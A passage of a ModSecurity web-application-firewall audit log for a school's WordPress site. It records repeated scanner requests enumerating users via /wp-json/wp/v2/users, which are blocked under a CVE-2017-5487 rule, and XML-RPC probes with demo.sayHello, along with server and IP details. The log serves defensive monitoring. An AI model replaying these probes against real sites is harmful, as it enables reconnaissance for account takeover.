/wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 84.46.243.56 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 84.46.243.56 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --b7481373-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b7481373-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746839932833506 2794 (- - -) Stopwatch2: 1746839932833506 2794; combined=1236, p1=425, p2=780, p3=0, p4=0, p5=31, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b7481373-Z-- --5b469613-A-- [10/May/2025:08:26:03 +0700] aB6rK8i6w7GTj2w44Z6cDgAAAMc 103.236.140.4 53568 103.236.140.4 8181 --5b469613-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.112.92 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.112.92 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --5b469613-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5b469613-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746840363978620 2877 (- - -) Stopwatch2: 1746840363978620 2877; combined=1270, p1=431, p2=808, p3=0, p4=0, p5=31, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5b469613-Z-- --cac4c978-A-- [10/May/2025:08:26:06 +0700] aB6rLsi6w7GTj2w44Z6cDwAAAMY 103.236.140.4 53574 103.236.140.4 8181 --cac4c978-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.112.201 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.112.201 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --cac4c978-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cac4c978-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746840366716256 2178 (- - -) Stopwatch2: 1746840366716256 2178; combined=996, p1=308, p2=661, p3=0, p4=0, p5=26, sr=65, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cac4c978-Z-- --74fa0c37-A-- [10/May/2025:08:26:09 +0700] aB6rMci6w7GTj2w44Z6cEgAAAM0 103.236.140.4 53580 103.236.140.4 8181 --74fa0c37-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.112.92 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.112.92 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --74fa0c37-C-- demo.sayHello --74fa0c37-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --74fa0c37-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746840369618101 4575 (- - -) Stopwatch2: 1746840369618101 4575; combined=3717, p1=440, p2=2894, p3=24, p4=27, p5=185, sr=73, sw=147, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --74fa0c37-Z-- --3f07356e-A-- [10/May/2025:08:26:13 +0700] aB6rNci6w7GTj2w44Z6cEwAAAMs 103.236.140.4 53582 103.236.140.4 8181 --3f07356e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.112.201 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.112.201 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3f07356e-C-- demo.sayHello --3f07356e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3f07356e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746840373706008 6806 (- - -) Stopwatch2: 1746840373706008 6806; combined=4855, p1=623, p2=3974, p3=45, p4=43, p5=100, sr=87, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3f07356e-Z-- --51b6ee51-A-- [10/May/2025:08:26:17 +0700] aB6rOci6w7GTj2w44Z6cFAAAANA 103.236.140.4 53586 103.236.140.4 8181 --51b6ee51-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.87.44 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.87.44 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --51b6ee51-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --51b6ee51-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746840377315151 2254 (- - -) Stopwatch2: 1746840377315151 2254; combined=1054, p1=399, p2=629, p3=0, p4=0, p5=26, sr=115, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --51b6ee51-Z-- --58396155-A-- [10/May/2025:08:26:22 +0700] aB6rPtr9PbfRBMhzxmRayQAAAEw 103.236.140.4 53592 103.236.140.4 8181 --58396155-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.87.44 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.87.44 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --58396155-C-- demo.sayHello --58396155-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --58396155-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746840382307783 5561 (- - -) Stopwatch2: 1746840382307783 5561; combined=4094, p1=565, p2=3312, p3=31, p4=35, p5=90, sr=79, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --58396155-Z-- --ed6b921d-A-- [10/May/2025:08:27:58 +0700] aB6rnsi6w7GTj2w44Z6cFwAAANM 103.236.140.4 53606 103.236.140.4 8181 --ed6b921d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.98.44 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.98.44 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ed6b921d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ed6b921d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746840478922676 2858 (- - -) Stopwatch2: 1746840478922676 2858; combined=1286, p1=428, p2=815, p3=0, p4=0, p5=43, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ed6b921d-Z-- --e4129a01-A-- [10/May/2025:08:28:09 +0700] aB6rqci6w7GTj2w44Z6cGQAAANE 103.236.140.4 53610 103.236.140.4 8181 --e4129a01-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.98.44 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.98.44 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e4129a01-C-- demo.sayHello --e4129a01-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e4129a01-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746840489158646 5001 (- - -) Stopwatch2: 1746840489158646 5001; combined=3840, p1=464, p2=3166, p3=27, p4=29, p5=91, sr=77, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e4129a01-Z-- --303f283a-A-- [10/May/2025:08:28:56 +0700] aB6r2Mi6w7GTj2w44Z6cHgAAAMU 103.236.140.4 53628 103.236.140.4 8181 --303f283a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.57.216 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.57.216 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --303f283a-C-- demo.sayHello --303f283a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --303f283a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746840536825188 5509 (- - -) Stopwatch2: 1746840536825188 5509; combined=4151, p1=507, p2=3373, p3=27, p4=33, p5=120, sr=70, sw=91, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --303f283a-Z-- --3440374e-A-- [10/May/2025:08:29:09 +0700] aB6r5auC4AqLGUOyzyX70QAAAJg 103.236.140.4 53632 103.236.140.4 8181 --3440374e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.171.213 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.171.213 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3440374e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3440374e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746840549943962 3485 (- - -) Stopwatch2: 1746840549943962 3485; combined=1537, p1=547, p2=952, p3=0, p4=0, p5=37, sr=141, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3440374e-Z-- --b7e9182c-A-- [10/May/2025:08:29:14 +0700] aB6r6quC4AqLGUOyzyX70gAAAIA 103.236.140.4 53636 103.236.140.4 8181 --b7e9182c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.171.213 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.171.213 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --b7e9182c-C-- demo.sayHello --b7e9182c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --b7e9182c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746840554681516 5720 (- - -) Stopwatch2: 1746840554681516 5720; combined=4242, p1=551, p2=3475, p3=31, p4=34, p5=90, sr=80, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b7e9182c-Z-- --3f032745-A-- [10/May/2025:08:30:21 +0700] aB6sLRLuBiaF9R054QBa1wAAAA4 103.236.140.4 53642 103.236.140.4 8181 --3f032745-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.166.145 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.166.145 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3f032745-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3f032745-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746840621179357 2891 (- - -) Stopwatch2: 1746840621179357 2891; combined=1240, p1=431, p2=778, p3=0, p4=0, p5=31, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3f032745-Z-- --9a5c7c62-A-- [10/May/2025:08:30:27 +0700] aB6sM6uC4AqLGUOyzyX70wAAAIM 103.236.140.4 53648 103.236.140.4 8181 --9a5c7c62-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.166.145 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.166.145 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9a5c7c62-C-- demo.sayHello --9a5c7c62-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9a5c7c62-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746840627756469 5676 (- - -) Stopwatch2: 1746840627756469 5676; combined=4117, p1=577, p2=3383, p3=22, p4=25, p5=65, sr=126, sw=45, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9a5c7c62-Z-- --d21c5f20-A-- [10/May/2025:08:30:29 +0700] aB6sNauC4AqLGUOyzyX71AAAAIQ 103.236.140.4 53650 103.236.140.4 8181 --d21c5f20-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.164.164 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.164.164 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d21c5f20-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d21c5f20-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746840629594430 2484 (- - -) Stopwatch2: 1746840629594430 2484; combined=1152, p1=417, p2=707, p3=0, p4=0, p5=27, sr=130, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d21c5f20-Z-- --6369c327-A-- [10/May/2025:08:30:35 +0700] aB6sO8i6w7GTj2w44Z6cIAAAAMo 103.236.140.4 53656 103.236.140.4 8181 --6369c327-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.164.164 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.164.164 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6369c327-C-- demo.sayHello --6369c327-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6369c327-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746840635558494 4708 (- - -) Stopwatch2: 1746840635558494 4708; combined=3635, p1=443, p2=2990, p3=26, p4=27, p5=88, sr=66, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6369c327-Z-- --3fa49533-A-- [10/May/2025:08:31:34 +0700] aB6sdhLuBiaF9R054QBa2wAAABY 103.236.140.4 53666 103.236.140.4 8181 --3fa49533-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 160.19.135.209 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 160.19.135.209 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --3fa49533-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3fa49533-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746840694019644 3432 (- - -) Stopwatch2: 1746840694019644 3432; combined=1544, p1=557, p2=955, p3=0, p4=0, p5=32, sr=137, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); 